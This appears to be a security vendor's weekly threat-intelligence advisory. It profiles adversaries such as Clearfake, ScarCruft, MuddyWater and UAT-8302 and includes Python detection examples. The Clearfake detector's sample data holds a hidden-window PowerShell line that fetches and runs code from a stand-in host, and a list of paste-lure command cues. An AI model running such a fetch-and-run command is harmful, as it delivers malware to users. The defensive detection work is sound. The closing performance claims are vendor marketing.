This week's threat landscape produced 9,366 indicators across 114 distinct adversaries, but the operationally important signal is concentrated in three patterns we're watching closely across customer environments:
- Parallel North Korean APT activity — DPRK, Kimsuky/APT43, and ScarCruft generating fresh telemetry in the same seven-day window, with ScarCruft executing a rare multi-OS supply-chain compromise.
- Iranian state operations under ransomware cover — a Chaos-branded ransomware incident assessed with moderate confidence as a MuddyWater false-flag operation, exactly the scenario where reactive SOC workflows commit to the wrong response.
- ClickFix / Clearfake dominance of initial access — 1,922 indicators in a single week, confirming that the "paste-this-into-PowerShell" lure has become the default initial-access path for commodity stealers.
Below is the adversary breakdown with our detection engineering lens applied: what each threat looks like in customer telemetry, where reactive SOC workflows typically lose time, and what AiStrike automates so your team isn't the one losing it.
The underlying threat intelligence in this brief is produced in partnership with HACKFORLAB's research team. The detection engineering analysis, coverage priorities, and platform context are AiStrike's own.
This Week in Numbers
- 9,366 IOCs indexed across 5 indicator types — URLs lead at 5,427, hashes at 3,200, domains at 613, IPs at 121, with a small set of email artifacts.
- 114 distinct adversaries active this week — meaningfully busier than the September 2025 baseline of ~85
- Severity skew is sharp: 7,601 IOCs (81%) carry a High severity rating; 1,703 are Medium; only 62 are Low
- By category: Malware leads with 4,487 IOCs across 81 distinct families. Malware campaigns account for 1,988 indicators across 5 active campaigns. C2 infrastructure: 1,679 IOCs across 17 frameworks. Named threat actors: 1,126 IOCs across 7 groups.
- State-sponsored fingerprint: DPRK alone accounts for 987 IOCs at average confidence 97 — one of the highest-quality clusters in this week's dataset.
Featured Adversary: Mirai — IoT Botnet
2,205 IOCs · High Severity · Confidence 85
Linux-based IoT botnet family scanning the public internet for cameras, routers, DVRs, and embedded devices with weak or default credentials. Long-running CVE arsenal includes CVE-2017-17215, CVE-2018-10561, CVE-2018-10562, and a half-dozen others most environments stopped tracking years ago. MITRE TTPs: T1110, T1071, T1105, T1498.
Where reactive workflows fall short. Mirai-family CVEs surface in vulnerability scans as low-priority “embedded device” findings. They get triaged, queued, and often forgotten — until a compromised device shows up as the pivot point in a larger incident. By then, the question is no longer “should we patch this?” but “how far did they get?”
The AiStrike detection engineering lens. Our platform correlates Mirai-family CVE signatures against your perimeter and segmentation telemetry continuously, not as a point-in-time scan. When an exposed device is reachable from an untrusted segment, we surface it as an exposure — not a vulnerability — and tie it to the active threat actors weaponizing that CVE this week. The output your team sees isn't "127 medium-severity findings"; it's "three devices on the wrong side of segmentation, all targeted by an active campaign, here's the blast radius."
Featured Adversary: Clearfake — Social-Engineering Malware Delivery
1,922 IOCs · High Severity · Confidence 80
Delivery technique that tricks users into copying attacker-supplied commands from fake error pages, "verify you are human" prompts, or compromised legitimate websites. The victim executes the payload manually — pasting attacker-controlled PowerShell into a Run dialog or terminal — which bypasses most automated controls because the malicious action originates inside the user's own session. Currently delivering Lumma, Vidar, Remcos RAT, and a rotating cast of loader chains. MITRE TTPs: T1566, T1204, T1059, T1105.
Where reactive workflows fall short. Clearfake is largely invisible to email gateways, web proxies, and endpoint AV at the point of compromise, because nothing malicious has touched the wire yet — just a webpage with text. The first telemetry you see is a PowerShell process spawning from a browser session, which many SOC workflows treat as either developer activity or a low-priority anomaly. By the time the downstream stealer fires a high-fidelity alert, credentials are often already exfiltrated. Mean dwell time on Clearfake intrusions is measured in minutes; mean detection time in IOC-centric environments is measured in hours.
The AiStrike detection engineering lens. We don't try to catch Clearfake at the malicious paste. We catch it at the behavior that follows — browser-spawned PowerShell, clipboard-sourced command execution, outbound connections to fresh infrastructure under three days old. Our platform correlates these signals against the active Clearfake campaign profile and elevates the session to investigation before the stealer payload completes, not after. For the 1,922 indicators in this week's feed, behavioral detection coverage is already deployed across customer environments — the question your team should be asking isn't "do we have the IOCs" but "is the behavioral detection live, and how do we know."
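The chain scoring described above, as an added example that is not AiStrike's code: it runs over constructed process-creation and network-connection records and treats each signal (browser parent, paste-style command line, outbound to infrastructure under three days old) as weak on its own, alerting only on the chain. The record fields, the paste-cue list and the 120-second window are assumptions for illustration; it is also the sequence check the coverage checklist asks for on T1566 + T1204 + T1059.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Command-line fragments typical of a pasted lure (constructed list, not exhaustive)
PASTE_CUES = ("-enc", "-w hidden", "iwr ", "irm ", "iex", "get-clipboard", "mshta http")
FRESH_DAYS = 3                    # "infrastructure under three days old"
WINDOW = timedelta(seconds=120)   # outbound must follow the spawn this quickly (assumed)

@dataclass
class Proc:                       # process-creation record (Sysmon event 1 style)
    ts: datetime
    parent: str
    image: str
    cmdline: str
    user: str

@dataclass
class Conn:                       # network-connection record (Sysmon event 3 style)
    ts: datetime
    image: str
    dest: str
    domain_age_days: int

def chain_signals(proc: Proc, conns: list[Conn]) -> list[str]:
    """Signals of the browser -> interpreter -> paste -> fresh-infra chain present."""
    signals = []
    if proc.parent.lower() in BROWSERS and proc.image.lower() in INTERPRETERS:
        signals.append("interpreter spawned by browser")
    if any(cue in proc.cmdline.lower() for cue in PASTE_CUES):
        signals.append("paste-style command line")
    for c in conns:   # first outbound from the same image inside the window
        if (c.image.lower() == proc.image.lower()
                and proc.ts <= c.ts <= proc.ts + WINDOW
                and c.domain_age_days < FRESH_DAYS):
            signals.append(f"outbound to {c.dest}, domain {c.domain_age_days}d old")
            break
    return signals

def verdict(proc: Proc, conns: list[Conn], min_signals: int = 2) -> str:
    """One signal is developer noise; two or more is the chain worth investigating."""
    return "investigate" if len(chain_signals(proc, conns)) >= min_signals else "baseline"

# Constructed sample: a pasted lure versus a developer opening a terminal
T0 = datetime(2026, 5, 11, 14, 3, 0)
LURE = Proc(T0, "chrome.exe", "powershell.exe",
            'powershell -w hidden -c "iwr http://lure.invalid/v | iex"', "jdoe")
DEV = Proc(T0, "explorer.exe", "pwsh.exe", "pwsh -NoLogo", "jdoe")
CONNS = [Conn(T0 + timedelta(seconds=4), "powershell.exe", "lure.invalid", 1),
         Conn(T0 + timedelta(seconds=9), "pwsh.exe", "github.com", 7000)]
```

Domain age would come from passive DNS or a registrar feed in practice; the developer session stays at baseline because none of its three signals fire.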
Featured Adversary: DPRK Cluster — North Korean APT
987 IOCs · High Severity · Confidence 97
State-aligned threat actor running spear phishing with weaponized documents and LNK loaders, delivering RokRAT and custom implants. Heavy use of zero-day exploits (CVE-2018-4878, CVE-2016-4117), in-memory execution, living-off-the-land techniques, and modular backdoors. This week's 987 IOCs at confidence 97 make this one of the highest-quality clusters in the dataset. MITRE TTPs: T1190, T1105, T1041, T1082.
Where reactive workflows fall short. High-confidence APT indicators arrive as IOC lists — IPs, domains, hashes — that get loaded into a SIEM watchlist and surface only when something matches. The matches, when they happen, often arrive without context: an alert fires on a hash hit, but the analyst has no immediate view of which identity touched it, what the surrounding session looked like, or whether the indicator is part of an active campaign or a stale signature. The result is hours of context-gathering before any response decision can be made.
The AiStrike detection engineering lens. When a DPRK-attributed indicator surfaces in customer telemetry, our agentic investigation automatically reconstructs the surrounding session — identity, process tree, lateral movement attempts, beaconing patterns — and maps it against the active campaign profile. Your analyst opens a single investigation that already answers the questions they would have spent 45 minutes assembling: who, where, what's connected, and what the highest-confidence next action is. For named-actor clusters at this confidence level, we're typically reducing mean-time-to-decision from hours to minutes.
Featured Adversary: ScarCruft — North Korea-Aligned Supply-Chain Compromise
24 IOCs · High Severity · Confidence 97
ESET researchers uncovered a multiplatform supply-chain attack by ScarCruft (APT37) targeting the Yanbian region in China — home to ethnic Koreans and a crossing point for North Korean refugees and defectors. The campaign, likely ongoing since late 2024, compromised both Windows and Android components of a regional gaming platform, trojanizing them with a backdoor. This is one of the rare publicly documented cases of a North Korean APT executing a full multi-OS supply-chain compromise of a niche regional platform.
Where reactive workflows fall short. Supply-chain compromises are the scenario where IOC-based detection fails most completely. The malicious code arrives signed, from a trusted vendor, through a sanctioned update channel. No perimeter alert fires. No reputation system flags it. The first signal — if one ever surfaces — is an anomalous outbound connection from a workstation running software the organization deliberately installed. IOC-centric workflows are structurally late on this attack class, often until the third or fourth lateral hop, because the entry point doesn't look like an entry point.
The AiStrike detection engineering lens. Supply-chain compromise detection benefits from behavioral baselining of trusted software at the per-process and per-identity level — what does this application normally do, what identities normally invoke it, what does its outbound profile look like. Our platform maintains those baselines continuously across customer environments and surfaces deviation patterns that map to known APT TTPs, not just to known IOCs. For the ScarCruft Yanbian campaign specifically, the relevant detection signature isn't the hashes — those will rotate. It's the cross-platform parent-child behavior of the trojanized components, which is one of the few detection approaches that materially shortens the dwell-time window between compromise and discovery. We don't claim to catch every supply-chain attack; we claim to measurably compress the window where it goes unseen.
Featured Adversary: MuddyWater — Iranian APT Under Ransomware False Flag
19 IOCs · High Severity · Confidence 97
A Chaos-branded ransomware incident in early May was assessed by Rapid7, with moderate confidence, as a MuddyWater (Seedworm / MOIS-affiliated) operation running under Chaos RaaS branding as a false flag. Code-signing certificates and C2 infrastructure linked the activity back to the Iranian APT. The pattern matches the IRGC playbook of using cybercriminal cover for state operations.
Where reactive workflows fall short. This is one of the most expensive scenarios a reactive SOC workflow can encounter. Ransomware playbooks are designed for speed: isolate, contain, restore, communicate. When the ransomware is the cover story for a state-sponsored intrusion, every action taken under the wrong playbook can make the real problem worse — premature isolation tips off the operator, communication to "the affiliate" goes to an intelligence service, and the actual objective (espionage, persistence, supply-chain pivoting) continues after the "incident" is closed. Reactive workflows commit to the wrong response in the first hour and may not discover the misattribution for weeks.
The AiStrike detection engineering lens. Our agentic investigation pauses response escalation when the infrastructure signature crosses known state-actor clusters, even when the surface-level indicators say ransomware. The platform surfaces the conflict — "Chaos branding, but code-signing infrastructure matches MuddyWater operator clusters from prior campaigns" — before the playbook commits to a containment path. That single pause, and the evidence that justifies it, is the difference between a clean state-actor investigation and a months-long quiet compromise dressed up as a ransomware incident.
Featured Adversary: UAT-8302 — China-Nexus APT
44 IOCs · High Severity · Confidence 97
Cisco Talos-disclosed China-nexus APT targeting government entities in South America (since late 2024) and southeastern Europe (in 2025). Deploys NetDraft — a C# variant of the FinalDraft / SquidDoor backdoor family — alongside an updated CloudSorcerer backdoor previously seen against Russian government entities in 2024. The cluster overlaps with Jewelbug, REF7707, CL-STA-0049, and LongNosedGoblin in other vendors' tracking.
Where reactive workflows fall short. UAT-8302's tradecraft is built around legitimate cloud services as command-and-control. CloudSorcerer family backdoors use cloud APIs — Microsoft Graph, Yandex Cloud, Dropbox, GitHub — as the C2 transport. To a perimeter SIEM, this looks like normal SaaS traffic from a corporate identity to a corporate cloud. There is no malicious domain to block, no anomalous TLS fingerprint, no exotic protocol. Detection requires baselining what each identity is supposed to do in those cloud services, not what cloud services they're allowed to reach. Many SOC workflows don't maintain that baseline at the per-identity, per-API level, which is why this attack class has been quietly successful for two years.
The AiStrike detection engineering lens. This is the threat class where our cloud-native posture matters most. We baseline identity behavior across AWS, Azure, and the SaaS surface continuously, and we elevate sessions where the API call patterns deviate from the identity's role — even when every individual call is permitted. For UAT-8302 specifically, the signature isn't "calls to GitHub"; it's "calls to GitHub from an identity that has never used GitHub before, immediately following a successful authentication from a residential ASN." That correlation is what we automate, and reactive SIEM-centric workflows struggle to match it on time-to-detection because the underlying baselining requirement isn't part of how those workflows are built.
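The per-identity, per-service baseline the paragraph describes, as an added example that is not AiStrike's code: it builds each identity's set of cloud services actually used in a 30-day lookback from constructed audit records, ignores whether policy permits a call, and elevates only a first-ever use of a service that follows a successful sign-in from a residential ASN. The record layout, the 30-day lookback, the 30-minute sign-in window and the ASN classification are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOOKBACK = timedelta(days=30)        # history that defines "normal" for an identity
AUTH_WINDOW = timedelta(minutes=30)  # how closely a sign-in must precede the API call

# Constructed sample records; asn_type would come from ASN enrichment in practice.
HISTORY = [  # (identity, cloud service, timestamp) observed inside the lookback
    ("svc-reporting@corp.example", "graph", datetime(2026, 4, 20)),
    ("svc-reporting@corp.example", "graph", datetime(2026, 5, 2)),
    ("alice@corp.example", "github", datetime(2026, 4, 28)),
    ("alice@corp.example", "graph", datetime(2026, 5, 1)),
]
AUTHS = [  # (identity, timestamp, result, asn_type)
    ("svc-reporting@corp.example", datetime(2026, 5, 10, 9, 0), "success", "residential"),
    ("alice@corp.example", datetime(2026, 5, 10, 9, 5), "success", "corporate"),
]
API_CALLS = [  # (identity, cloud service, timestamp, permitted by policy?)
    ("svc-reporting@corp.example", "github", datetime(2026, 5, 10, 9, 12), True),
    ("alice@corp.example", "github", datetime(2026, 5, 10, 9, 20), True),
    ("alice@corp.example", "dropbox", datetime(2026, 5, 10, 9, 25), True),
    ("svc-reporting@corp.example", "graph", datetime(2026, 5, 10, 9, 30), True),
]
NOW = datetime(2026, 5, 10, 10, 0)

def build_baseline(history, now):
    """Services each identity has actually used inside LOOKBACK, not what it may use."""
    base = defaultdict(set)
    for ident, svc, ts in history:
        if now - ts <= LOOKBACK:
            base[ident].add(svc)
    return base

def residential_signin_before(auths, ident, ts):
    """True if a successful sign-in from a residential ASN precedes ts within AUTH_WINDOW."""
    return any(a_ident == ident and result == "success" and asn == "residential"
               and ts - AUTH_WINDOW <= a_ts <= ts
               for a_ident, a_ts, result, asn in auths)

def evaluate(calls, auths, history, now):
    """(identity, service, disposition) for calls outside the identity's baseline.
    Policy permission is deliberately not consulted: every call here is allowed."""
    base = build_baseline(history, now)
    findings = []
    for ident, svc, ts, _permitted in calls:
        if svc in base[ident]:
            continue                                    # inside the normal profile
        if residential_signin_before(auths, ident, ts):
            findings.append((ident, svc, "elevate"))    # new service + risky sign-in
        else:
            findings.append((ident, svc, "note"))       # new service alone: track only
    return findings

def run_sample():
    return evaluate(API_CALLS, AUTHS, HISTORY, NOW)
```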
MITRE ATT&CK Coverage Validation — This Week's Priorities
The adversaries above concentrate around a recognizable set of ATT&CK techniques. If you only have time to validate detection coverage on a subset of techniques this week, validate these — they are the techniques your team is most likely to encounter in customer telemetry between now and the next advisory.
Coverage validation steps for the week:
- Run an ATT&CK heat-map self-assessment against the table above. For each technique marked Critical or High, identify whether you have at least one alerting detection in your environment and at least one hunting query.
- For T1566 + T1204 + T1059 together — the Clearfake chain — validate that your detection can fire on the sequence (phishing landing → user execution → script interpreter), not just on the individual techniques. The chain is the signal; the techniques in isolation are too noisy to alert on.
- For T1078 in cloud environments — the UAT-8302 tradecraft — confirm you have per-identity, per-API baselining, not just "is this account allowed to call this service." Most SIEM-driven environments answer the wrong question here.
- For T1041 across DPRK and Kimsuky — confirm that your egress monitoring covers the 51.79.0.0/16 and 27.102.0.0/16 ranges named in this week's high-confidence IOCs (full IOC list available on request).
Detection Engineering Priorities This Week
The seven priorities below convert this week's adversary data into platform-automated outcomes. If your SOC is running these as manual hunts, every one of them is a place where time-to-decision can be measurably compressed.
- Continuous CVE-to-exposure mapping for the Mirai / Mozi long tail. Patching the perimeter isn't a quarterly project; it's a continuous reconciliation of "which devices are exposed, to which CVEs, weaponized by which active actors this week." Our platform maintains that mapping in real time and surfaces only the intersections that matter.
- Behavioral detection for ClickFix / Clearfake initial access. IOCs rotate weekly. Browser-spawned interactive shells and clipboard-sourced execution don't. We deploy detection coverage for the behavioral signature, not the indicators, which is why this week's 1,922 new Clearfake URLs don't change our customers' detection posture.
- Identity-level baselining for RMM tool abuse. ITarian, PDQ, SimpleHelp, Atera, ScreenConnect — legitimate tools, blocked by no one. The VENOMOUS#HELPER cluster's 41 IOCs are a reminder that the right control isn't blocking the tools but knowing which identities should be using them. We baseline this per-identity and alert on the deviation.
- Cross-platform supply-chain behavior analytics. The ScarCruft Yanbian compromise is the canonical example: hash-based detection will always be late. Per-application behavioral baselines, sustained across Windows and Android telemetry, are one of the few approaches that materially shortens the dwell window for this attack class.
- State-actor false-flag pause logic. When ransomware-branded infrastructure crosses known state-actor operator clusters, our platform pauses response escalation and surfaces the conflict to the analyst before the containment playbook commits. The MuddyWater-as-Chaos incident is exactly the scenario this logic is built for.
- Cloud-API identity baselining for China-nexus tradecraft. UAT-8302 and its overlapping clusters demonstrate that C2-over-SaaS is now a dominant exfiltration path for sophisticated APTs. Detection requires baselining identity behavior in the cloud control plane, not at the perimeter. This is native to our platform.
- Continuous patching prioritization for weaponized long-tail CVEs. EternalBlue (CVE-2017-0144), Follina (CVE-2022-30190), and Equation Editor (CVE-2017-11882) are still being weaponized in 2026. Our platform tracks which dormant vulnerabilities in your environment have been picked back up in active campaigns this week, so the patch queue reflects threat reality, not vulnerability inventory.
See This in Production at Gartner SRM 2026
If the MuddyWater false-flag scenario, the UAT-8302 cloud-API detection logic, or the ScarCruft cross-platform baselining are familiar problems in your environment, we'll be walking through all three in production telemetry at Gartner Security & Risk Management Summit 2026 — Booth #453, June 1–3, National Harbor, MD.
Live demos focus on the operational moments this brief describes: the investigation pause when ransomware infrastructure crosses state-actor clusters, the identity baseline that catches cloud-API C2, and the behavioral detection that doesn't care which IOCs Clearfake rotates next week.
The AiStrike Detection Engineering Advisory publishes weekly. Subscribe for next week's coverage validation priorities, ATT&CK technique deep-dives, and platform-automated detection outcomes.
AiStrike delivers AI-native, preemptive cyber defense — turning reactive SOCs into proactive ones through agentic investigation, continuous detection optimization, and automated response. Customers see 50% lower SOC costs and 90% fewer false positives. Threat intelligence partnership: HACKFORLAB. Detection engineering analysis: AiStrike Detection Operations.